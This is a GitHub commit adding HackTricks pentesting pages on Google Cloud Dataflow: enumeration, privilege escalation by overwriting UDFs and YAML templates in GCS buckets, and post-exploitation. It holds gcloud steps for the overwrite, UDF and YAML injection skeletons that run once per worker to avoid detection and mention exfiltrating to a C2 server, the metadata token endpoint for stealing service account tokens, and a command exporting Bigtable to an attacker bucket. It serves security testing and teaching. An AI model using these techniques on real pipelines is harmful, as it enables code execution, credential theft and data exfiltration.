Skip to content

Commit 1685887

Browse files
authored
Merge pull request #259 from Tamirye/dataflowrider
grte-ye-ti
2 parents fd262d7 + cd9939d commit 1685887

File tree

4 files changed

+327
-0
lines changed

4 files changed

+327
-0
lines changed

src/SUMMARY.md

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -95,6 +95,7 @@
9595
- [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md)
9696
- [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
9797
- [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md)
98+
- [GCP - Dataflow Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md)
9899
- [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md)
99100
- [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md)
100101
- [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md)
@@ -123,6 +124,7 @@
123124
- [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md)
124125
- [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md)
125126
- [GCP - Dataproc Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md)
127+
- [GCP - Dataflow Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md)
126128
- [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md)
127129
- [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md)
128130
- [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md)
@@ -176,6 +178,7 @@
176178
- [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md)
177179
- [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md)
178180
- [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md)
181+
- [GCP - Dataflow Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md)
179182
- [GCP - Dataproc Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.md)
180183
- [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md)
181184
- [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md)
Lines changed: 55 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,55 @@
1+
# GCP - Dataflow Post Exploitation
2+
3+
{{#include ../../../banners/hacktricks-training.md}}
4+
5+
## Dataflow
6+
7+
For more information about Dataflow check:
8+
9+
{{#ref}}
10+
../gcp-services/gcp-dataflow-enum.md
11+
{{#endref}}
12+
13+
### Using Dataflow to exfiltrate data from other services
14+
15+
**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (over a SA with access to source and sink)
16+
17+
With Dataflow job creation rights, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub, and other services into attacker-controlled GCS buckets. This is a powerful post-exploitation technique when you have obtained Dataflow access—for example via the [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation (pipeline takeover via bucket write).
18+
19+
> [!NOTE]
20+
> You need `iam.serviceAccounts.actAs` over a service account with sufficient permissions to read the source and write to the sink. By default, the Compute Engine default SA is used if not specified.
21+
22+
#### Bigtable to GCS
23+
24+
See [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) — "Dump rows to your bucket" for the full pattern. Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.
25+
26+
<details>
27+
28+
<summary>Export Bigtable to attacker-controlled bucket</summary>
29+
30+
```bash
31+
gcloud dataflow jobs run <job-name> \
32+
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
33+
--project=<PROJECT> \
34+
--region=<REGION> \
35+
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
36+
--staging-location=gs://<YOUR_BUCKET>/staging/
37+
```
38+
39+
</details>
40+
41+
#### BigQuery to GCS
42+
43+
Dataflow templates exist to export BigQuery data. Use the appropriate template for your target format (JSON, Avro, etc.) and point the output to your bucket.
44+
45+
#### Pub/Sub and streaming sources
46+
47+
Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
48+
49+
## References
50+
51+
- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
52+
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
53+
- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)
54+
55+
{{#include ../../../banners/hacktricks-training.md}}
Lines changed: 184 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,184 @@
1+
# GCP - Dataflow Privilege Escalation
2+
3+
{{#include ../../../banners/hacktricks-training.md}}
4+
5+
## Dataflow
6+
7+
{{#ref}}
8+
../gcp-services/gcp-dataflow-enum.md
9+
{{#endref}}
10+
11+
### `storage.objects.create`, `storage.objects.get`, `storage.objects.update`
12+
13+
Dataflow does not validate integrity of UDFs and job template YAMLs stored in GCS.
14+
With bucket write access, you can overwrite these files to inject code, execute code on the workers, steal service account tokens, or alter data processing.
15+
Both batch and streaming pipeline jobs are viable targets for this attack. In order to execute this attack on a pipeline we need to replace UDFs/templates before the job runs, during the first few minutes (before the job workers are created) or during the job run before new workers spin up (due to autoscaling).
16+
17+
**Attack vectors:**
18+
- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets
19+
- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets
20+
21+
22+
> [!WARNING]
23+
> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: check if a marker file (e.g. `/tmp/pwnd.txt`) exists at the start; if it exists, skip malicious code; if not, run the payload and create the file. This ensures the payload runs **once per worker**, not per line.
24+
25+
26+
#### Direct exploitation via gcloud CLI
27+
28+
1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:
29+
30+
<details>
31+
32+
<summary>List jobs and describe to get template path, staging location, and UDF references</summary>
33+
34+
```bash
35+
# List jobs (optionally filter by region)
36+
gcloud dataflow jobs list --region=<region>
37+
gcloud dataflow jobs list --project=<PROJECT_ID>
38+
39+
# Describe a job to get template GCS path, staging location, and any UDF/template references
40+
gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
41+
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
42+
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
43+
```
44+
45+
</details>
46+
47+
2. Download the original UDF or job template from GCS:
48+
49+
<details>
50+
51+
<summary>Download UDF file or YAML template from bucket</summary>
52+
53+
```bash
54+
# If job references a UDF at gs://bucket/path/to/udf.py
55+
gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py
56+
57+
# Or for a YAML job template
58+
gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
59+
```
60+
61+
</details>
62+
63+
3. Edit the file locally: inject the malicious payload (see Python UDF or YAML snippets below) and ensure the run-once coordination pattern is used.
64+
65+
4. Re-upload to overwrite the original file:
66+
67+
<details>
68+
69+
<summary>Overwrite UDF or template in bucket</summary>
70+
71+
```bash
72+
gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py
73+
74+
# Or for YAML
75+
gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
76+
```
77+
78+
</details>
79+
80+
5. Wait for the next job run, or (for streaming) trigger autoscaling (e.g. flood the pipeline input) so new workers spin up and pull the modified file.
81+
82+
#### Python UDF injection
83+
84+
If you want to have a the worker exfiltrate data to your C2 server use `urllib.request` and not `requests`.
85+
`requests` is not preinstalled on classic Dataflow workers.
86+
87+
<details>
88+
89+
<summary>Malicious UDF with run-once coordination and metadata extraction</summary>
90+
91+
```python
92+
import os
93+
import json
94+
import urllib.request
95+
from datetime import datetime
96+
97+
def _malicious_func():
98+
# File-based coordination: run once per worker.
99+
coordination_file = "/tmp/pwnd.txt"
100+
if os.path.exists(coordination_file):
101+
return
102+
103+
# malicous code goes here
104+
with open(coordination_file, "w", encoding="utf-8") as f:
105+
f.write("done")
106+
107+
def transform(line):
108+
# Malicous code entry point - runs per line but coordination ensures once per worker
109+
try:
110+
_malicious_func()
111+
except Exception:
112+
pass
113+
# ... original UDF logic follows ...
114+
```
115+
116+
</details>
117+
118+
119+
#### Job template YAML injection
120+
121+
Inject a `MapToFields` step with a callable that uses a coordination file. For YAML-based pipelines that support `requests`, use it if the template declares `dependencies: [requests]`; otherwise prefer `urllib.request`.
122+
123+
Add the cleanup step (`drop: [malicious_step]`) so the pipeline still writes valid data to the destination.
124+
125+
<details>
126+
127+
<summary>Malicious MapToFields step and cleanup in pipeline YAML</summary>
128+
129+
130+
```yaml
131+
- name: MaliciousTransform
132+
type: MapToFields
133+
input: Transform
134+
config:
135+
language: python
136+
fields:
137+
malicious_step:
138+
callable: |
139+
def extract_and_return(row):
140+
import os
141+
import json
142+
from datetime import datetime
143+
coordination_file = "/tmp/pwnd.txt"
144+
if os.path.exists(coordination_file):
145+
return True
146+
try:
147+
import urllib.request
148+
# malicious code goes here
149+
with open(coordination_file, "w", encoding="utf-8") as f:
150+
f.write("done")
151+
except Exception:
152+
pass
153+
return True
154+
append: true
155+
- name: CleanupTransform
156+
type: MapToFields
157+
input: MaliciousTransform
158+
config:
159+
fields: {}
160+
append: true
161+
drop:
162+
- malicious_step
163+
```
164+
165+
</details>
166+
167+
### Compute Engine access to Dataflow Workers
168+
169+
**Permissions:** `compute.instances.osLogin` or `compute.instances.osAdminLogin` (with `iam.serviceAccounts.actAs` over the worker SA), or `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (with `iam.serviceAccounts.actAs`) for legacy SSH key injection
170+
171+
Dataflow workers run as Compute Engine VMs. Access to workers via OS Login or SSH lets you read SA tokens from the metadata endpoint (`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`), manipulate data, or run arbitrary code.
172+
173+
For exploitation details, see:
174+
- [GCP - Compute Privesc](gcp-compute-privesc/README.md) — `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata`
175+
176+
## References
177+
178+
- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
179+
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
180+
- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
181+
- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
182+
- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)
183+
184+
{{#include ../../../banners/hacktricks-training.md}}
Lines changed: 85 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,85 @@
1+
# GCP - Dataflow Enum
2+
3+
{{#include ../../../banners/hacktricks-training.md}}
4+
5+
## Basic Information
6+
7+
**Google Cloud Dataflow** is a fully managed service for **batch and streaming data processing**. It enables organizations to build pipelines that transform and analyze data at scale, integrating with Cloud Storage, BigQuery, Pub/Sub, and Bigtable. Dataflow pipelines run on worker VMs in your project; templates and User-Defined Functions (UDFs) are often stored in GCS buckets. [Learn more](https://cloud.google.com/dataflow).
8+
9+
## Components
10+
11+
A Dataflow pipeline typically includes:
12+
13+
**Template:** YAML or JSON definitions (and Python/Java code for flex templates) stored in GCS that define the pipeline structure and steps.
14+
15+
**Launcher (Flex Templates):** A short-lived Compute Engine instance may be used for Flex Template launches to validate the template and prepare containers before the job runs.
16+
17+
**Workers:** Compute Engine VMs that execute the actual data processing tasks, pulling UDFs and instructions from the template.
18+
19+
**Staging/Temp buckets:** GCS buckets that store temporary pipeline data, job artifacts, UDF files, flex template metadata (`.json`).
20+
21+
## Batch vs Streaming Jobs
22+
23+
Dataflow supports two execution modes:
24+
25+
**Batch jobs:** Process a fixed, bounded dataset (e.g. a log file, a table export). The job runs once to completion and then terminates. Workers are created for the duration of the job and shut down when done. Batch jobs are typically used for ETL, historical analysis, or scheduled data migrations.
26+
27+
**Streaming jobs:** Process unbounded, continuously arriving data (e.g. Pub/Sub messages, live sensor feeds). The job runs until explicitly stopped. Workers may scale up and down; new workers can be spawned due to autoscaling, and they will pull pipeline components (templates, UDFs) from GCS at startup.
28+
29+
## Enumeration
30+
31+
Dataflow jobs and related resources can be enumerated to gather service accounts, template paths, staging buckets, and UDF locations.
32+
33+
### Job Enumeration
34+
35+
To enumerate Dataflow jobs and retrieve their details:
36+
37+
```bash
38+
# List Dataflow jobs in the project
39+
gcloud dataflow jobs list
40+
# List Dataflow jobs (by region)
41+
gcloud dataflow jobs list --region=<region>
42+
43+
# Describe job (includes service account, template GCS path, staging location, parameters)
44+
gcloud dataflow jobs describe <job-id> --region=<region>
45+
```
46+
47+
Job descriptions reveal the template GCS path, staging location, and worker service account—useful for identifying buckets that store pipeline components.
48+
49+
### Template and Bucket Enumeration
50+
51+
Buckets referenced in job descriptions may contain flex templates, UDFs, or YAML pipeline definitions:
52+
53+
```bash
54+
# List objects in a bucket (look for .json flex templates, .py UDFs, .yaml pipeline defs)
55+
gcloud storage ls gs://<bucket>/
56+
57+
# List objects recursively
58+
gcloud storage ls gs://<bucket>/**
59+
```
60+
61+
## Privilege Escalation
62+
63+
{{#ref}}
64+
../gcp-privilege-escalation/gcp-dataflow-privesc.md
65+
{{#endref}}
66+
67+
## Post Exploitation
68+
69+
{{#ref}}
70+
../gcp-post-exploitation/gcp-dataflow-post-exploitation.md
71+
{{#endref}}
72+
73+
## Persistence
74+
75+
{{#ref}}
76+
../gcp-persistence/gcp-dataflow-persistence.md
77+
{{#endref}}
78+
79+
## References
80+
81+
- [Dataflow overview](https://cloud.google.com/dataflow)
82+
- [Pipeline workflow execution in Dataflow](https://cloud.google.com/dataflow/docs/guides/pipeline-workflows)
83+
- [Troubleshoot templates](https://cloud.google.com/dataflow/docs/guides/troubleshoot-templates)
84+
85+
{{#include ../../../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)